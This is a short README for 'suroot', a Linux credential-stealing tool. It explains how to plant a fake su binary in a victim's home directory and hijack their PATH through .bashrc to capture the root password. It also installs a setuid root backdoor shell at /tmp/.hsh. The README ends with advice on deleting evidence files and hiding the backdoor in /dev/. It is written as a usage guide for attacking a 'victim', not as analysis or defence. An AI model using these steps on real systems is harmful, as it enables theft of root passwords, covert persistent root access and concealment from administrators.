How to install it :

make         (to create binaries)
./test       (to see if suroot will work on the computer)
make install (to place the setuid backdoor to /tmp/.hsh)

How to use it :

You must have an account of an user who 'su root' frequently.
example:

victim@linux $ mkdir .bin
victim@linux $ mv suroot .bin/su
victim@linux $ echo "export PATH=/home/victim/.bin:$PATH" >> .bashrc
victim@linux $ logout

--- we wait for victim to login and type su ---
what victim will see :
victim@linux $ su
Password:
root@linux #

--- now we login as victim ---
to get the root password
victime@linux $ ./readpass
lucid4

to get a root shell
victim@linux $ /tmp/.hsh
root@linux #

Don't forget to rm files after you get root !
rm /tmp/.sb      (file with the XORed root password)
rm /tmp/.socksys (socket file used by suroot)

and don't forget to put the backdoor to a better place
(for exemple in /dev/)

Well best way to use suroot is to know how it works
Best way to know how it works is to study teh source ;)
